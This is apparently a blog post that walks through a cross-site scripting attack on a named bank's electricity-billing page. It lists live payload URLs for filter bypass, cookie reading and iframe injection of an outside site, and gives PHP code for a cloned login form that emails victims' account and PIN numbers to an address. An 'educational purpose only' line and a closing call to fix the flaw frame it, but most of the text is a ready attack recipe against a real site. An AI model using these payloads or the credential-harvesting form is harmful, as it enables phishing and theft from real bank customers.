Fake Login Page with XSS IFRAME | C B Bank - Online Electricity Billing Payment System(GBPS)

When XSS vulnerabilities on bank websites are exploited by phishers, is too late to undo the unwanted consequences. The phishers were able to inject a modified login form onto the bank’s login page, specifically an IFRAME which loads the fake login form from a web server. Even if the login page uses SSL, does not mean that is secure against XSS attacks. Web security unaware customers are easily tricked to enter sensitive personal information, especially if the cross-site scripting attack vector is obfuscated.

Cross site scripting (XSS) is where one site manages to run a script on another site, with the privileges of you, the user, Using a browser side scripting language (usually JavaScript). The goal of the attacker is to make the malicious script appear to be from the site being attacked, so the user’s browser can’t tell the script being executed is not meant to be aprt of the site they are viewing. This is usually accomplished by an attacker by submitting specially crafted values into the target site’s URL or web forms, or anywhere user generated content is displayed on the site.

Note: Educational purpose only.

Well, Let me show you something about Fake Login Page with XSS – Using IFRAME
First I’m going to visit the following site:

http://www.cbbankmm.com/gbps_meter.php?l=e

Fake Login Page with XSS IFRAME | C B Bank - Online Electricity Billing Payment System(GBPS)

Yes, It’s normal, and try to insert some XSS scripts.

Basic XSS code:

http://www.cbbankmm.com/gbps_meter.php?l=e<script>alert("XSS")</script>

Fake Login Page with XSS IFRAME | C B Bank - Online Electricity Billing Payment System(GBPS)

Nope,

 

Test again with these, Bypass the script tag filtering:

http://www.cbbankmm.com/gbps_meter.php?l=e'><script>alert("XSS")</script>

Fake Login Page with XSS IFRAME | C B Bank - Online Electricity Billing Payment System(GBPS)

Grab Cookies with XSS

http://www.cbbankmm.com/gbps_meter.php?l=e'><script>alert(document.cookie)</script>

Fake Login Page with XSS IFRAME | C B Bank - Online Electricity Billing Payment System(GBPS)

IFRAME

http://www.cbbankmm.com/gbps_meter.php?l=e'><iframe src="http://planetcreator.net"></iframe>

Fake Login Page with XSS IFRAME | C B Bank - Online Electricity Billing Payment System(GBPS)

Finally : Let create Fake Login Page with PHP

– Clone Original Page

– Go to Login Form (tag)

– Write some script … That’s all.

<?php if(isset($_POST['submit'])) {
	error_reporting(0);
	$txtAccountNo = mysql_real_escape_string($_POST['txtAccountNo']);
	$txtPinCode = mysql_real_escape_string($_POST['txtPinCode']);
	$txtCapcha = mysql_real_escape_string($_POST['txtCapcha']);
	if($txtAccountNo==""){
		$msg="Your account number is empty";
	}elseif($txtPinCode==""){
		$msg="Your pin number is empty";
	}elseif($txtCapcha==""){
		$msg="Please enter your Capcha Code";
	}elseif($txtCapcha !="odj03I0"){
		$msg="Check Capcha code and type again";
	}else{
		$email_contents= $txtAccountNo." | ".$txtPinCode;
		$mail = mail("[email protected]", "Acc Info from CB", $email_contents);
		header("https://billing.yatanarpon.com.mm/electricity/cbbank/default.aspx?Type=Large");
	}
}
?>

Fake Login Page with XSS IFRAME | C B Bank - Online Electricity Billing Payment System(GBPS)

This FAKE login form which can convince gather a user’s credentials such as Account and Pin Numbers. If the victim logs in via the fake login page, their Those Account and Pin is transmitted to the fraudsters and they are subsequently presented with original login page. Information requested includes Account Number. and Pin Number..

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

ZoneAlarm Using ”Scareware” to Sell Firewall

ZoneAlarm’s developer is using scareware tactics to force free-version clients into purchasing the full suite. Firewall developer Check Point Software Technologies has come under fire from consumers using the free

Finding 0days in Web Applications

Most zero-day exploits in web applications are usually easier to find, study, and attack than actual services like a webserver due to the fact that a hacker does not need

Single-line attack infects thousands of Web sites

Thousands of Web sites have fallen victim to an attack using just one line of code that maliciously re-directs browsers via Javascript to servers that are hosting a variety of